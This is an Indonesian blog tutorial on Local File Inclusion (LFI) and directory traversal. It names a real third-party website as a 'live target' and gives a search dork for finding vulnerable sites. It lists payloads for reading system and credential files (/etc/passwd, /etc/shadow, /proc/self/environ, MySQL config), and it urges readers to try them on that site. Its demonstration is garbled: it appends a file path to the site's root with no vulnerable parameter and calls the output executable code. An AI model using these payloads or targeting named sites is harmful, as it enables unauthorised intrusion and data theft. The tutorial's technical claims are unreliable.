Tutorial Local File Inculison (LFI)

 

Assalamualaikum warahmatullahi wabarokhatu hallo semua nya balik lagi di blog saya,di artikel kali ini saya akan membahas tentang apa itu "LOCAL FILE INCLUSION (LFI)"

Penjelasan Local File Inculison (LFI)

Local File Inclusion (LFI) adalah kerentanan yang sering ditemukan dalam aplikasi web yang ditulis dengan buruk,Kerentanan ini terjadi ketika aplikasi web memungkinkan pengguna untuk mengirimkan input ke file atau mengupload file ke sebuah server

Kerentanan LFI memungkinkan penyerang untuk membaca dan mengeksekusifile pada mesin korban,Ini bisa sangat berbahaya karena jika server web salah konfigurasi dan berjalan dengan hak istimewa tinggi, penyerang dapat memperoleh akses ke informasi sensitif.

Cara Kerja Local File Inculison (LFI)

File Inclusion biasanya diperlukan untuk menjaga kode aplikasi web tetap rapi dan terpelihara,Mereka juga memungkinkan aplikasi web untuk membaca file.

Tetapi ini bisa berbahaya jika tidak diterapkan dengan benar, penyerang dapat mengeksploitasi mereka dan membuat serangan LFI yang dapat menyebabkan pengungkapan informasi, Cross-Site-Scripting (XSS) dan kerentanan Remote Code Execution (RCE).

Bahkan tanpa kemampuan untuk mengupload dan mengeksekusi kode, kerentanan Local File Inclusion dapat berbahaya. Penyerang masih dapat melakukan serangan Directory Traversal menggunakan kerentanan LFI seperti contoh di bawah ini 

https://website.com/?file=index.php

Dapat diubah menjadi 

https://website.com/?file=/etc/passwd

contoh di atas,penyerang bisa mendapatkan konten file /etc/passwd yang berisi daftar pengguna di server menggunakan kerentanan Local File Inclusion,untuk melakukan serangan Directory Traversal. Demikian pula, penyerang dapat memanfaatkan kerentanan Direktori Traversal untuk mendapatkan akses ke kredensial, log, kode sumber, dan informasi sensitif lainnya yang dapat membantu memajukan serangan.

Tutorial Local File Inculison (LFI)

Dork

inurl://site .com php?page= 

Di sini saya menggunakan target website vuln Local File Inculison (LFI)

Target>>

https://www.hackerfactor.com

Seperti penjelasan di atas dari kita menggunakan payload untuk mengexploitasi local File Inculison untuk payload nya terdapat banyak sekali ya ok contoh payload LFi di bawah ini

/etc/issue

/etc/passwd

/etc/shadow

/etc/group

/etc/hosts

/etc/motd

/etc/mysql/my.cnf

/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)

/proc/self/environ

/proc/version

/proc/cmdline

Ok salin salah satu payload di atas contoh nya yang saya gunakan sekarang adalah /etc/passwd,di atas saya sudah kasih target live untuk di coba ya ok langsung saja kita pasang payload nya di website tersebut 

https://www.hackerfactor.com/etc/passwd

Di sini setelah saya pasang payload nya keluar sebuah kode"ya nah kode"tersebut bisa di eksekusi seperti yang saya jelaskan di atas tadi.

Kesimpulan

Jadi Local File Inclusion (LFI) adalah kerentanan yang umum ditemukan pada situs/Website. Kerentanan ini ada ketika aplikasi web menyertakan file tanpa membersihkan input dengan benar.

Sekian artikel dari saya tentang Local File Inclusion (LFI) Sampai jumpa di artikel selanjutnya semoga bermanfaat:)

Bagikan Artikel ini